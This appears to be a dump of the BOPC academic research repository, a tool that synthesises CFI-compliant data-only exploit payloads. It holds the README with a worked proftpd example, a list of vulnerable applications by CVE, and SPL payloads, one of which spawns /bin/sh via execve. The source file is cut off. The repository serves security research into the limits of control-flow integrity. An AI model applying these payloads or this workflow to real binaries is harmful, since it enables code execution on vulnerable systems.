[
  {
    "path": "README.md",
    "content": "\n\n# Block Oriented Programming Compiler (BOPC)\n\n___\n\n\n## What is BOPC\n\n**NEW:** The talk from CCS'18 presentation is available\n[here](https://www.youtube.com/watch?v=iK7jhrK5uyg).\n\n\n\nBOPC (stands for _BOP Compiler_) is a tool for automatically synthesizing arbitrary,\nTuring-complete, _Data-Only_ payloads. BOPC finds execution traces in the binary that\nexecute the desired payload while adhering to the binary's Control Flow Graph (CFG).\nThis implies that the existing control flow hijacking defenses are not sufficient to\ndetect this style of execution, as execution does never violates the Control Flow\nIntegrity (CFI).\n\nEssentially, we can say that Block Oriented Programming is _code reuse under CFI_. \n\nBOPC works with basic blocks (hence the name \"block-oriented\"). What it does is to find\na set of _functional_ blocks (i.e., blocks that perform useful computations). This step\nis somewhat similar with finding Return Oriented Programming (ROP) gadgets.\nHaving the functional blocks, BOPC looks for _dispatcher_ blocks to that are used to\nstitch functional blocks together. Compared to ROP (that we can move from one gadget\nto the next without any limitation), here we can't do that as it would violate the CFI.\nInstead, BOPC finds a proper sequence for dispatcher blocks that naturally lead the\nexecution from one functional block to the next one.\nUnfortunately the problem of building _Data-Only_ payloads is NP-hard. 
\nHowever it turns out that in practice BOPC finds solution in a reasonable amount\nof time.\n\n\nFor more details on how BOPC works, please refer to our [paper](./ccs18_paper.pdf),\nand our [slides](./ccs18_slides.pdf) from CCS'18.\n\n\nTo operate, BOPC requires 3 inputs:\n* A target binary that has an _Arbitrary Memory Write_ (AWP) vulnerability (**hard requirement**)\n* The desired payload, expressed in a high level language called SPL (stands for _SPloit Language_)\n* The so-called \"_entry point_\", which is the first instruction in the binary that the\npayload execution should start. There can be more than one entry points and determining it is\npart of the vulnerability discovery process.\n\n\nThe output of BOPC is a set of \"what-where\" memory writes that indicate how the memory \nshould be initialized (i.e., what values to write at which memory addresses). \nWhen the execution reaches the entry point and the memory is initialized according to\nthe output of BOPC, the target binary execute the desired payload instead of continuing\nthe original execution.\n\n\n**Disclaimer:** This is a research project coded by a single guy. It's not a product,\nso do **not** expect it to work perfectly under all scenarios. It works nicely for the\n provided test cases, but beyond that we cannot guarantee that will work as expected.\n\n___\n\n\n## Installation\nJust run `setup.sh` :)\n\n___\n\n\n## How to use BOPC\n\nBOPC started as a hacky project, so several changes made to adapt it into an scientific\ncontext. That is, the implementation in the [paper](./ccs18_paper.pdf) is slightly\ndifferent from the actual implementation, as we omitted several implementation details\nfrom the paper. 
The actual implementation overview is shown below:\n![alt text](./source/images/BOPC_overview.png)\n\n\n\n### Command line arguments explained\n\nA good place to start are the command line arguments:\n\n```\nusage: BOPC.py [-h] [-b BINARY] [-a {save,load,saveonly}] [--emit-IR] [-d]\n               [-dd] [-ddd] [-dddd] [-V] [-s SOURCE] [-e ENTRY]\n               [-O {none,ooo,rewrite,full}] [-f {raw,idc,gdb}] [--find-all]\n               [--mapping-id ID] [--mapping MAP [MAP ...]] [--enum-mappings]\n               [--abstract-blk BLKADDR] [-c OPTIONS [OPTIONS ...]]\n\noptional arguments:\n  -h, --help            show this help message and exit\n\nGeneral Arguments:\n  -b BINARY, --binary BINARY\n                        Binary file of the target application\n  -a {save,load,saveonly}, --abstractions {save,load,saveonly}\n                        Work with abstraction file\n  --emit-IR             Dump SPL IR to a file and exit\n  -d                    Set debugging level to minimum\n  -dd                   Set debugging level to basic (recommended)\n  -ddd                  Set debugging level to verbose (DEBUG ONLY)\n  -dddd                 Set debugging level to print-everything (DEBUG ONLY)\n  -V, --version         show program's version number and exit\n\nSearch Options:\n  -s SOURCE, --source SOURCE\n                        Source file with SPL payload\n  -e ENTRY, --entry ENTRY\n                        The entry point in the binary that payload starts\n  -O {none,ooo,rewrite,full}, --optimizer {none,ooo,rewrite,full}\n                        Use the SPL optimizer (Default: none)\n  -f {raw,idc,gdb}, --format {raw,idc,gdb}\n                        The format of the solution (Default: raw)\n  --find-all            Find all the solutions\n\nApplication Capability:\n  -c OPTIONS [OPTIONS ...], --capability OPTIONS [OPTIONS ...]\n                        Measure application's capability. 
Options (can be many)\n                        \n                        all\tSearch for all Statements\n                        regset\tSearch for Register Assignments\n                        regmod\tSearch for Register Modifications\n                        memrd\tSearch for Memory Reads\n                        memwr\tSearch for Memory Writes\n                        call\tSearch for Function/System Calls\n                        cond\tSearch for Conditional Jumps\n                        load\tLoad capabilities from file\n                        save\tSave capabilities to file\n                        noedge\tDump statements and exit (don't calculate edges)\n\nDebugging Options:\n  --mapping-id ID       Run the Trace Searching algorithm on a given mapping ID\n  --mapping MAP [MAP ...]\n                        Run the Trace Searching algorithm on a given register mapping\n  --enum-mappings       Enumerate all possible mappings and exit\n  --abstract-blk BLKADDR\n                        Abstract a specific basic block and exit\n```\n\nOk, there are a lot of options here (divided into 4 categories) as BOPC can do several things.\n\nLet's start with the **General Arguments**. To avoid working directly with assembly, BOPC,\n\"abstracts\" each basic block into a set of \"actions\". For more details, please check\n[absblk.py](./source/absblk.py). Abstraction process symbolically executes each basic block\nin the binary and carefully monitors its actions. The abstraction process can take from a few\nminutes (for small binaries) to several hours (for the larger ones). Waiting that much every\ntime that you want to run BOPC does not sound a good idea, so BOPC uses an old trick: _caching_.\n\nThe abstraction process depends on the binary and not on the SPL payload nor the entry point,\nso we only need to calculate them *once* per binary. Therefore, we have to calculate the\nabstractions only one time, then save them into a file and each time loading them. 
\nThe `save` and `saveonly` options save the abstractions into a file. The only difference is that\n`saveonly` halts execution after it saves the abstractions, while `save` continues to search\nfor a solution. As you can guess, the `load` option loads the abstractions from a file.\n\nThe `--emit-IR` option is used to \"dump\" the IR representation of the SPL payload (this is\nanother intermediate result that you should not worry about it).\n\nBOPC provides 5 verbosity levels: no option, `-d`, `-dd`, `-ddd` and `-dddd`. I recommend you\nto use either the `-dd` or the `-ddd` to get a detailed progress status.\n\nLet's get into the **Search Options** options. The most important arguments here are the\n`--source` (which is a file that contains the SPL payload) and the `--entry` which is an\naddress inside the binary that indicates the entry point. Trace searching starts from the\nentry point, so this is quite important.\n\n\nThe optimizer (`-O` option) is double edge knife. On the one hand, it optimizes the SPL\npayload to make it more flexible. This means that it increases the likelihood to find a\nsolution. On the other hand, the search space (along with the execution time) is increased.\nThe decision is up to the user, hence the use of optimizer is optional. The 2 possible\noptimizations are the _out of order execution_ (`ooo` option) and the _statement rewriting_\n(`rewrite` option). \n\n\nThe out-of-order optimization reorders payload statements.\nConsider for example the following SPL payload:\n```\n\t__r0 = 13;\n\t__r1 = 37;\n```\n\nTo find a solution here, BOPC must find a functional block for the first statement (`__r0 = 13`)\nthen a functional block for the second statement (`__r1 = 37`) and a set of dispatcher blocks\nto connect these two statements. However these functional blocks may be far apart so a dispatcher\nmay not exist. 
However, it makes no difference whether you execute the `__r0 = 13` statement first\nor second, as it has no dependencies on the other statement. Thus, if we rewrite\nthe payload as follows:\n```\n\t__r1 = 37;\n\t__r0 = 13;\n```\n\nit may be possible to find another set of dispatcher blocks, hopefully a much smaller one \n(path `A -> B` may be much longer than path `B -> A`), and find a solution.\n\nInternally, this is a **two-step** process. First, the optimizer **groups** independent\nstatements together (for more details take a look [here](./source/optimize.py)) and\ngenerates an augmented SPL IR. Then the trace search module permutes statements\nwithin each group, each time resulting in a different SPL payload. However, all these\npayloads are equivalent. As you can guess, there can be an exponential number of \npermutations, so this can take forever. To alleviate that, you can adjust the\n`N_OUT_OF_ORDER_ATTEMPTS` configuration parameter and tell BOPC to stop after trying \n**N** iterations, instead of trying all of them.\n\n\n\nStatement rewriting is an under-development optimization that rewrites\nstatements whose operations do not exist in the binary. For instance, if the SPL payload\nspawns a shell through `execve()` but the target binary does not invoke\n`execve()` at all, then BOPC fails, as there are no functional blocks for that statement.\nHowever, if the target binary invokes `execv()`, it may be possible to find a solution\nby replacing `execve()` with `execv()`. The optimizer contains a list of possible replacements\nand adjusts the payload accordingly.\n\n\nAs we already explained, the output of BOPC is a set of \"what-where\" memory writes. There\nare several ways to express the output. For instance, it can be raw lines containing the\naddress, the value, and the size of the data that should be written in memory. 
Or they can\nbe a gdb/IDA script that can run directly on the debugger and modify the memory accordingly.\nThe last option is the best one as it you only need to run the BOPC output into the debugger.\nCurrently only the `gdb` format is implemented.\n\n\n\nThe **Application Capability** options used to measure _Application's capabilities_, that\ngives us upper bounds on **what** payloads the target binary is capable of executing.\n\n\nFinally the **Debugging Options** assist the audit/debugging/development process. They are used\nto bypass parts of the BOP work-flow. Do not use them unless you're doing changes in the code.\nRecall that BOPC finds a mapping between virtual and host registers along with a mapping\nbetween SPL variables and underlying memory addresses. If that mapping does not lead to\na solution it goes back and tries another one. If you want to focus on a specific mapping\n(e.g., let's say that code crashes at mapping 458), you don't have to wait for BOPC to try\nthe first 457 mappings first. By supplying the `--mapping-id=458` option you can skip\nall mappings and focus on that one. In case that you don't know the mapping number but you\nknow the actual mapping you can instead you the `--mapping` option: `--mapping=`__r0=rax __r1=rbx`\n\n\n\nFinally, BOPC has a lot of configuration options. You see all of them in \n[config.py](./source/config.py) and adjust them according to our needs. The default\nvalues are a nice trade off between accuracy and performance that I found during\nthen evaluation.\n\n\n## Example\n\nLet's see now how to actually use BOPC. The first thing to do is to get the basic block\nabstractions. This step is optional, but I expect that you are going to run BOPC several times,\nso it's a good idea to get the abstractions first:\n```\n./source/BOPC.py -dd --binary $BINARY --abstractions saveonly\n```\n\nThis calculates the abstractions and saves them into a  file named `$BINARY.abs`. 
Don't forget\nto enable debugging to see the status on the screen.\n\n\nWriting an SPL payload is pretty much like writing C:\n```C\nvoid payload() \n{ \n    string prog = \"/bin/sh\\0\";\n    int argv    = {&prog, 0x0};\n\n    __r0 = &prog;\n    __r1 = &argv;\n    __r2 = 0;\n    \n    execve(__r0, __r1, __r2);\n}\n```\n\n\nPlease take a look at the available [payloads](./payloads) to see all features of SPL.\nDon't expect to write crazy programs with SPL; yes, in theory you can write any program.\nIn practice, the more complicated the SPL payload is, the more the complexity increases\nand the harder it gets to find a solution.\n\n\nRunning BOPC is as simple as the following:\n```\n./source/BOPC.py -dd --binary $BINARY --source $PAYLOAD --abstractions load \\\n--entry $ENTRY --format gdb\n```\n\nIf everything goes well, an `*.gdb` file will be created that contains the set of memory writes\nto execute the desired payload.\n\n\n### Pruning search space\n\nA common problem is that there can be thousands of mappings (it's exponential in the \nnumber of registers and variables that are used). Each mapping can take up to a minute to test\n(assuming out-of-order execution and other optimizations), so BOPC may run for days.\n\nHowever, if you know approximately where a solution could be, you can ask BOPC to quickly find\n(and verify) it, without trying all mappings. Let's assume that you want to execute the following\nSPL payload:\n```C\nvoid payload() \n{ \n    string msg = \"This is my random message! 
:)\\0\";\n\n    __r0 = 0;\n    __r1 = &msg;\n    __r2 = 32;\n\n    write( __r0, __r1, __r2 );\n}\n```\n\nBecause we have a system call, we know the register mapping: \n`__r0 <-> rdi, __r1 <-> rsi, __r2 <-> rdx`.\n\nLet's assume that we're on `proftpd` binary which contains the following \"all-in-one\"\nfunctional block:\n```Assembly\n.text:000000000041D0B5 loc_41D0B5:\n.text:000000000041D0B5        mov     edi, cs:scoreboard_fd ; fd\n.text:000000000041D0BB        mov     edx, 20h        ; n\n.text:000000000041D0C0        mov     esi, offset header ; buf\n.text:000000000041D0C5        call    _write\n```\n\nThe abstractions for this basic block, will be the following (recall that to get the\nabstractions for a single basic block, you need to pass the `--abstract-blk 0x41D0B5`\nin the command line).\n```\n[22:02:07,822] [+] Abstractions for basic block 0x41d0b5:\n[22:02:07,823] [+]          regwr :\n[22:02:07,823] [+] \t\trsp = {'writable': True, 'const': 576460752303359992L, 'type': 'concrete'}\n[22:02:07,823] [+] \t\trdi = {'sym': {}, 'memrd': None, 'type': 'deref', 'addr': <BV64 0x66e9e0>, 'deps': []}\n[22:02:07,823] [+] \t\trsi = {'writable': True, 'const': 6787008L, 'type': 'concrete'}\n[22:02:07,823] [+] \t\trdx = {'writable': False, 'const': 32L, 'type': 'concrete'}\n[22:02:07,823] [+]          memrd : set([(<SAO <BV64 0x66e9e0>>, 32)])\n[22:02:07,823] [+]          memwr : set([(<SAO <BV64 0x7ffffffffff07f8>>, <SAO <BV64 0x41d0ca>>)])\n[22:02:07,823] [+]          conwr : set([(576460752303359992L, 64)])\n[22:02:07,823] [+]       splmemwr : []\n[22:02:07,823] [+]           call : {}\n[22:02:07,823] [+]           cond : {}\n[22:02:07,823] [+]        symvars : {}\n[22:02:07,823] [*] \n```\n\nHere, `__r0 <-> rdi` is loaded indirectly and the value of `__r1 <-> rsi` (which holds the `msg` \nvariable) is `6787008` or `0x678fc0` in hex. Then we enumerate all possible mappings with the\n`--enum-mappings` option. 
Here, there are *287* possible mappinges, but there are instances that\nwe have thousands of mappings:\n\n\nIf we look at the output we can quickly search for the appropriate mapping, which in our case\nis mapping *#89*:\n```\n[.... TRUNCATED FOR BREVITY ....]\n[21:59:28,471] [*] Trying mapping #88:\n[21:59:28,471] [*] \tRegisters: __r0 <-> rdi | __r1 <-> rsi | __r2 <-> rdx\n[21:59:28,471] [*] \tVariables: msg <-> *<BV64 0x7ffffffffff1440>\n[21:59:28,614] [*] Trying mapping #89:\n[21:59:28,614] [*] \tRegisters: __r0 <-> rdi | __r1 <-> rsi | __r2 <-> rdx\n[21:59:28,614] [*] \tVariables: msg <-> 0x678fc0L\n[21:59:28,762] [*] Trying mapping #90:\n[21:59:28,762] [*] \tRegisters: __r0 <-> rdi | __r1 <-> rsi | __r2 <-> rdx\n[21:59:28,762] [*] \tVariables: msg <-> *<BV64 r12_56287_64 + 0x28>\n[.... TRUNCATED FOR BREVITY ....]\n[22:00:04,709] [*] Trying mapping #287:\n[22:00:04,709] [*] \tRegisters: __r0 <-> rdi | __r1 <-> rsi | __r2 <-> rdx\n[22:00:04,709] [*] \tVariables: msg <-> *<BV64 __add__(((0#32 .. rbx_294059_64[31:0]) << 0x5), r12_294068_64, 0x10)>\n[22:00:04,979] [+] Trace searching algorithm finished with exit code 0\n```\n\nNow that we know the actual mapping, we can tell BOPC to focus on this one. 
All we have to\ndo is to pass the `--mapping-id 89` option.\n\n\nWe run this and after 1 minute and 51 seconds later, we get the solution:\n```\n#\n# This file has been created by BOPC at: 29/03/2018 22:04\n# \n# Solution #1\n# Mapping #89\n# Registers: __r0 <-> rdi | __r1 <-> rsi | __r2 <-> rdx\n# Variables: msg <-> 0x678fc0L\n# \n# Simulated Trace: [(0, '41d0b5', '41d0b5'), (4, '41d0b5', '41d0b5'), (6, '41d0b5', '41d0b5'), (8, '41d0b5', '41d0b5'), (10, '41d0b5', '41d0b5')]\n# \n\nbreak *0x403740\nbreak *0x41d0b5\n\n# Entry point\nset $pc = 0x41d0b5 \n\n# Allocation size is always bigger (it may not needed at all)\nset $pool = malloc(20480)\n\n# In case that rbp is not initialized\nset $rbp = $rsp + 0x800 \n\n# Stack and frame pointers aliases\nset $stack = $rsp \nset $frame = $rbp \n\nset {char[30]} (0x678fc0) = {0x54, 0x68, 0x69, 0x73, 0x20, 0x69, 0x73, 0x20, 0x6d, 0x79, 0x20, 0x72, 0x61, 0x6e, 0x64, 0x6f, 0x6d, 0x20, 0x6d, 0x65, 0x73, 0x73, 0x61, 0x67, 0x65, 0x21, 0x20, 0x3a, 0x29, 0x00}\n\nset {char[8]} (0x66e9e0) = {0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00}\n```\n\nLet's take a closer look here. The _Simulated Trace_ comment shows the path that BOPC followed.\nThis is a list of `($pc, $src, $dst)` tuples. `$pc` is the program counter of the SPL statement.\n`$src` is the address of the functional block for the current SPL statement and `$dst` is the\naddress of the next functional block.\n\n\nBefore it runs, script adjusts `$rip` to point to the entry point, and makes sure that\nstack pointers (`$rsp`, `$rbp`) are valid. It also allocates a \"variable pool\" (for\nmore details please look at [simulate.py](./source/simulate.py)) which in our case is not\nused.\n\nThen we have the two actual memory writes at `0x678fc0` and at `0x66e9e0`. 
If you load\nthe binary in gdb and run this script you will see your payload being executed:\n\n```\n(gdb) break main\nBreakpoint 5 at 0x4041a0\n(gdb) run\nStarting program: /home/ispo/BOPC/evaluation/proftpd \n\nBreakpoint 1, 0x00000000004041a0 in main ()\n(gdb) continue\nContinuing.\n\nBreakpoint 3, 0x000000000041d0b5 in pr_open_scoreboard ()\n(gdb) continue\nContinuing.\n\nBreakpoint 2, 0x0000000000403740 in write@plt ()\n(gdb) continue\nContinuing.\nThis is my random message! :)\nProgram received signal SIGSEGV, Segmentation fault.\n0x00007fffffffde60 in ?? ()\n```\n\nNote that BOPC stops after executing the desired payload (hence the crash). If you\nwant to avoid this situation you can use the `returnto` SPL statement to naturally\ntransfer execution to a safe location.\n\n\n\n### Measuring application capabilities\n\n**NOTE:** This is a new concept, which is not mentioned in the paper. \n\nBeyond finding Data-Only payloads, BOPC provides some basic capability measurements.\nAlthough it is not related to the Block Oriented Programming, it can provide upper\nbounds and strong \"indications\" on what types of payloads can be executed and what\nare not. This is very useful as we can quickly find types of payloads that **cannot**\nbe executed in the target binary.  
\nTo get the all application capabilities run the following code:\n```\n./source/BOPC.py -dd --binary $BINARY --abstractions load --capability all save\n```\n\nIf you want to simply dump all functional gadgets for a specific statement, you can do\nit as follows:\n```\n./source/BOPC.py -dd --binary $BINARY --abstractions load --capability $STMT noedge\n```\n\nWhere `$STMT` can be one ore more from `{all, regset, regmod, memrd, memwr, call, cond}`.\nThe `noedge` option is to boost things up (essentially it does not calculate edges in the\ncapability graph; Each node in the capability graph represents a functional block from\nthe binary while and edge represents the context-sensitive shortest path distance\nbetween two functional blocks).\n\n\n___\n\n\n## Final Notes (please read them carefully!)\n\n* When the symbolic execution engine deals with filesystem (i.e., it has to `open` a file),\nwe have to provide it a valid file. Filename is defined in `SYMBOLIC_FILENAME` in \n[coreutils.py](./source/coreutils.py).\n\n* If you want to visualize things, just uncomment the code in search.py. I'm too lazy to add\nCLI flags to trigger it :P\n\n* In case that addresses used by concolic execution do not work, adjust them from \n[simulate.py](./source/simulate.py)\n\n* Make sure that `$rsp` is consistent in `dump()` in [simulate.py](./source/simulate.py)\n\n* For any questions/concerns regarding the code, you can contact [ispo](https://github.com/ispoleet)\n\n___\n\n"
  },
  {
    "path": "evaluation/README.md",
    "content": "\n\n# Block Oriented Programming Compiler (BOPC)\n___\n\n\n### Vulnerable Application Overview\n\n\n| Application                | CVE           |\n|----------------------------|---------------|\n|[ProFTPd](./proftpd)        | CVE-2006-5815 |\n|[nginx](./nginx1)           | CVE-2013-2028 |\n|[sudo](./sudo)              | CVE-2012-0809 |\n|[orzhttpd](./orzhttpd)      | BugtraqID 41956 |\n|[wuftdp](./wuftpd)          | CVE-2000-0573 |\n|[nullhttpd](./nullhttpd)    | CVE-2002-1496 |\n|[opensshd](./opensshd)      | CVE-2001-0144 |\n|[wireshark](./lt-wireshark) | CVE-2014-2299 |\n|[apache](./httpd)           | CVE-2006-3747 |\n|[smbclient](./smbclient)    | CVE-2009-1886 |\n\n___\n"
  },
  {
    "path": "payloads/README.md",
    "content": "\n\n# Block Oriented Programming Compiler (BOPC)\n___\n\n\n### SPL Payload Overview\n\n\n| Payload                  | Description                                 |\n|--------------------------|---------------------------------------------|\n| [regset4](./regset4.spl) | Initialize 4 registers with arbitrary values |\n| [regref4](./regref4.spl) | Initialize 4 registers with pointers to arbitrary memory |\n| [regset5](./regset5.spl) | Initialize 5 registers with arbitrary values |\n| [regref5](./regref5.spl) | Initialize 5 registers with pointers to arbitrary memory |\n| [regmod](./regmod.spl)   | Initialize a register with an arbitrary value and modify it |\n| [memrd](./memrd.spl)     | Read from arbitrary memory |\n| [memwr](./memwr.spl)     | Write to arbitrary memory |\n| [print](./print.spl)     | Display a message to stdout using write |\n| [execve](./execve.spl)   | Spawn a shell through execve |\n| [abloop](./abloop.spl)   | Perform an arbitrarily long bounded loop utilizing regmod |\n| [infloop](./infloop.spl) | Perform an infinite loop that sets a register in its body |\n| [ifelse](./ifelse.spl)   | An if-else condition based on a register comparison |\n| [loop](./loop.spl)       | Conditional loop with register modification |\n\n\n___\n"
  },
  {
    "path": "payloads/abloop.spl",
    "content": "// \n// BOPC Evaluation\n//\n// Arbitrary bounded loop with register modification\n//\nvoid payload() \n{ \n    __r0 = 0;\n\nLOOP:\n\n    __r0 += 1;\n\n    goto LOOP;\n}\n\n"
  },
  {
    "path": "payloads/execve.spl",
    "content": "// \n// BOPC Evaluation\n//\n// execve('/bin/sh') payload\n//\nvoid payload() \n{ \n    string prog = \"/bin/sh\\0\";\n    int argv    = {&prog, 0x0};\n\n    __r0 = &prog;\n    __r1 = &argv;\n    __r2 = 0;\n    \n    execve(__r0, __r1, __r2);\n\n    // return ?\n}\n"
  },
  {
    "path": "payloads/ifelse.spl",
    "content": "// \n// BOPC Evaluation\n//\n// Simple if-else condition\n//\nvoid payload() \n{ \n    __r0 = 0;\n\n    if (__r0 != 0 ) goto SKIP;\n\n    __r1 = 1;\n\n    goto END;\n\nSKIP:\n    __r1 = 0;\n\n\nEND:\n    // return 0x400ca7;\n    __r0 = 0;\n\n}\n"
  },
  {
    "path": "payloads/infloop.spl",
    "content": "// \n// BOPC Evaluation\n//\n// Infinity loop with constant assignment\n//\nvoid payload() \n{ \n\n//  __r0 = 1;\n\nLOOP:\n    __r1 = 0;\n\n    goto LOOP;\n}\n"
  },
  {
    "path": "payloads/loop.spl",
    "content": "// \n// BOPC Evaluation\n//\n// Simple loop\n//\nvoid payload() \n{ \n    __r0 = 0;\n\nLOOP:\n    __r0 += 1;\n\n    if (__r0 != 3 ) goto LOOP;\n}\n"
  },
  {
    "path": "payloads/memrd.spl",
    "content": "// \n// BOPC Evaluation\n//\n// Memory Load\n//\nvoid payload() \n{ \n    int array = {1, 2, 3, 4, 5};\n    \n    __r1 = &array;\n\n    __r0 = *__r1;\n\n}\n"
  },
  {
    "path": "payloads/memwr.spl",
    "content": "// \n// BOPC Evaluation\n//\n// Memory Store\n//\nvoid payload() \n{ \n    int array = {1, 2, 3, 4, 5};\n    \n    __r0 = &array;\n    __r1 = 0;\n\n    *__r0 = __r1;\n\n}\n"
  },
  {
    "path": "payloads/print.spl",
    "content": "// \n// BOPC Evaluation\n//\n// Print an arbitrary message to stdout using write()\n//\nvoid payload() \n{ \n    string msg = \"This is my random message! :)\\0\";\n\n    __r0 = 0;\n    __r1 = &msg;\n    __r2 = 1;\n\n\n    write( __r0, __r1, __r2 );\n\n    // return 0x?? ;s\n}\n"
  },
  {
    "path": "payloads/regmod.spl",
    "content": "// \n// BOPC Evaluation\n//\n// Register modification\n//\nvoid payload() \n{ \n    __r0 = 0;\n\n    __r0 += 1;\n}\n"
  },
  {
    "path": "payloads/regref4.spl",
    "content": "// \n// BOPC Evaluation\n//\n// Initialize 4 registers with references\n//\nvoid payload() \n{ \n    int    var_a = 0x100;\n    string var_b = \"this is a random string\";\n    int    var_c = {1, 2, 3, &var_a, 4, &var_b};\n    int    var_d = &var_c;\n\n    __r0 = &var_a;\n    __r1 = &var_b;\n    __r2 = &var_c;\n    __r3 = &var_d;\n}\n"
  },
  {
    "path": "payloads/regref5.spl",
    "content": "// \n// BOPC Evaluation\n//\n// Initialize 5 registers with references\n//\nvoid payload() \n{ \n\tlong   var_a = 0x100;\n\tstring var_b = \"this is a random string\\x00\";\n\n\tlong    *var_c = {1, 2, 3, 4, &var_a, &var_b};\n\tlong    var_d = &var_c;\n\tlong    *var_e = {&var_d, &var_d, &var_d};\n\n\t__r0 = &var_a;\n\t__r1 = &var_b;\n\t__r2 = &var_c;\n\t__r3 = &var_d;\n\t__r4 = &var_e;\n\n\t// return ??\n}\n"
  },
  {
    "path": "payloads/regset4.spl",
    "content": "// \n// BOPC Evaluation\n//\n// Initialize 4 registers\n//\nvoid payload() \n{ \n    __r0 = 0;\n    __r1 = 1;\n    __r2 = 2;\n    __r3 = 3;\n}\n"
  },
  {
    "path": "payloads/regset5.spl",
    "content": "// \n// BOPC Evaluation\n//\n// Initialize 5 registers\n//\nvoid payload() \n{ \n    __r0 = 0;\n    __r1 = 1;\n    __r2 = 2;\n    __r3 = 3;\n    __r4 = 4;\n}\n"
  },
  {
    "path": "setup.sh",
    "content": "#!/bin/bash\n# -------------------------------------------------------------------------------------------------\n#\n#    ,ggggggggggg,     _,gggggg,_      ,ggggggggggg,      ,gggg,  \n#   dP\"\"\"88\"\"\"\"\"\"Y8, ,d8P\"\"d8P\"Y8b,   dP\"\"\"88\"\"\"\"\"\"Y8,  ,88\"\"\"Y8b,\n#   Yb,  88      `8b,d8'   Y8   \"8b,dPYb,  88      `8b d8\"     `Y8\n#    `\"  88      ,8Pd8'    `Ybaaad88P' `\"  88      ,8Pd8'   8b  d8\n#        88aaaad8P\" 8P       `\"\"\"\"Y8       88aaaad8P\",8I    \"Y88P'\n#        88\"\"\"\"Y8ba 8b            d8       88\"\"\"\"\"   I8'          \n#        88      `8bY8,          ,8P       88        d8           \n#        88      ,8P`Y8,        ,8P'       88        Y8,          \n#        88_____,d8' `Y8b,,__,,d8P'        88        `Yba,,_____, \n#       88888888P\"     `\"Y8888P\"'          88          `\"Y8888888 \n#\n#   The Block Oriented Programming (BOP) Compiler - v2.1\n#\n#\n# Kyriakos Ispoglou (ispo) - ispo@purdue.edu\n# PURDUE University, Fall 2016-18\n# -------------------------------------------------------------------------------------------------\nmsg() {\n    GREEN='\\033[01;32m'                         # bold green\n    NC='\\033[0m'                                # no color\n    echo -e \"${GREEN}[INFO]${NC} $1\"\n}\n\nerror() {\n    RED='\\033[01;31m'                           # bold red\n    NC='\\033[0m'                                # no color\n    echo -e \"${RED}[ERROR]${NC} $1\"\n}\n\n\n# display fancy foo\nclear\necho\necho -e '\\t%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%'\necho -e '\\t%                                                                    %'\necho -e '\\t%                :::::::::   ::::::::  :::::::::   ::::::::          %'\necho -e '\\t%               :+:    :+: :+:    :+: :+:    :+: :+:    :+:          %'\necho -e '\\t%              +:+    +:+ +:+    +:+ +:+    +:+ +:+                  %'\necho -e '\\t%             +#++:++#+  +#+    +:+ +#++:++#+  +#+            
       %'\necho -e '\\t%            +#+    +#+ +#+    +#+ +#+        +#+                    %'\necho -e '\\t%           #+#    #+# #+#    #+# #+#        #+#    #+#              %'\necho -e '\\t%          #########   ########  ###         ########                %'\necho -e '\\t%                                                                    %'\necho -e '\\t%                Block Oriented Programming Compiler                 %'\necho -e '\\t%                                                                    %'\necho -e '\\t%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%'\necho \nmsg \"BOPC Installation Guide has been started ...\"\n\n\n# base check (we need root)\nif [ \"$EUID\" -ne 0 ]; then\n    error \"Script needs root permissions to install the required packages.\"\n    msg \"Please run as 'sudo $0' (you can have a look at the source, if you don't trust me)\"\n    echo\n\n    exit\nfi\n\n# install prerequisites first\napt-get install --yes python-pip\napt-get install --yes graphviz libgraphviz-dev\napt-get install --yes pkg-config python-tk \n\n\n# install pip packages\npip install angr==7.8.9.26\npip install claripy==7.8.9.26\npip install matplotlib\npip install simuvex\n# networkx must be installed after simuvex and angr, since they depend\n# on networkx 2.1\npip install networkx==1.11\npip install graphviz==0.8.1\npip install pygraphviz==1.3.1\n\n\nmsg \"BOPC Installation completed ...\"\nmsg \"Have a nice day :)\"\necho\n\n# -------------------------------------------------------------------------------------------------\n"
  },
  {
    "path": "source/BOPC.py",
    "content": "#!/usr/bin/env python2\n# -------------------------------------------------------------------------------------------------\n#\n#    ,ggggggggggg,     _,gggggg,_      ,ggggggggggg,      ,gggg,  \n#   dP\"\"\"88\"\"\"\"\"\"Y8, ,d8P\"\"d8P\"Y8b,   dP\"\"\"88\"\"\"\"\"\"Y8,  ,88\"\"\"Y8b,\n#   Yb,  88      `8b,d8'   Y8   \"8b,dPYb,  88      `8b d8\"     `Y8\n#    `\"  88      ,8Pd8'    `Ybaaad88P' `\"  88      ,8Pd8'   8b  d8\n#        88aaaad8P\" 8P       `\"\"\"\"Y8       88aaaad8P\",8I    \"Y88P'\n#        88\"\"\"\"Y8ba 8b            d8       88\"\"\"\"\"   I8'          \n#        88      `8bY8,          ,8P       88        d8           \n#        88      ,8P`Y8,        ,8P'       88        Y8,          \n#        88_____,d8' `Y8b,,__,,d8P'        88        `Yba,,_____, \n#       88888888P\"     `\"Y8888P\"'          88          `\"Y8888888 \n#\n#   The Block Oriented Programming (BOP) Compiler - v2.1\n#\n#\n# Kyriakos Ispoglou (ispo) - ispo@purdue.edu\n# PURDUE University, Fall 2016-18\n# -------------------------------------------------------------------------------------------------\n#\n# BOPC.py:\n#\n#\n# This is the main module of BOPC. 
It configures the environment and launches the other modules.\n#\n# -------------------------------------------------------------------------------------------------\nfrom coreutils import *\nimport absblk     as A\nimport compile    as C\nimport optimize   as O\nimport mark       as M\nimport search     as S\nimport capability as P\n\nimport argparse\nimport textwrap\nimport ntpath\nimport angr\nimport os\nimport sys\n\n\n\n# ------------------------------------------------------------------------------------------------\n# Constant Definitions\n# ------------------------------------------------------------------------------------------------\nVERSION  = 'v2.1'                                   # current version\ncomments = ''                                       # Additional comments to display on startup\n\n\n\n# -------------------------------------------------------------------------------------------------\n# parse_args(): This function processes the command line arguments.\n#\n# :Ret: None.\n#\ndef parse_args():\n    # create the parser object and the groups\n    parser = argparse.ArgumentParser(formatter_class=argparse.RawTextHelpFormatter)\n\n    group_g = parser.add_argument_group('General Arguments')\n    group_s = parser.add_argument_group('Search Options')\n    group_c = parser.add_argument_group('Application Capability')\n    group_d = parser.add_argument_group('Debugging Options')\n\n\n    # -------------------------------------------------------------------------\n    # Group for general arguments\n    # -------------------------------------------------------------------------\n    group_g.add_argument(\n        '-b', \"--binary\",\n        help     = \"Binary file of the 